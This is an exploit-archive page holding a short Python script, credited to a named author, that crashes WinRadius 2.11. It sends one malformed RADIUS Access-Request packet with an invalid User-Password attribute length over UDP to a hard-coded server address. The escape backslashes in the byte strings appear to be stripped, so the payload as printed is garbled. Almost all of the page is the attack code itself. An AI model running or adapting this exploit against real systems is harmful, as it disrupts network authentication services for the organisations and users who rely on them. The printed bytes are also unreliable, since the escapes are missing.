WinRadius 2.11 Denial Of Service

Posted on 12 June 2013
#!/usr/bin/python

#Exploit Title: WinRadius 2.11 DoS
#Date: 10th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-winradius-2-11/
#Vendor Homepage: [ADVERT HOLDING PAGE] http://www.itconsult2000.com/
#Software Link: http://download.cnet.com/WinRadius/3000-2085_4-10131429.html
#Version: 2.2
#Tested on: Windows XP SP3 English

from socket import *
import sys
import select

pwn = "x01" #Code 01
pwn += "xff" #packet identifier
pwn += "x00x2c" #len 44
pwn += "xd1x56x8ax38xfbxeax4ax40xb7x8axa2x7ax8fx3exaex23" #authenticator
pwn += "x01" #t=User-Name(1)
pwn += "x06" #avp: l=6
pwn += "x61x64x61x6d" #adam

pwn += "x02" #avp t=User-Password(2)
pwn += "xff" #avp: l=18
pwn += "xf0x13x57x7ex48x1ex55xaax7dx29x6dx7ax88x18x89x21" #password (enc)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)
TOP
Malware :

None in database
Last 20
Exploits :

Last 20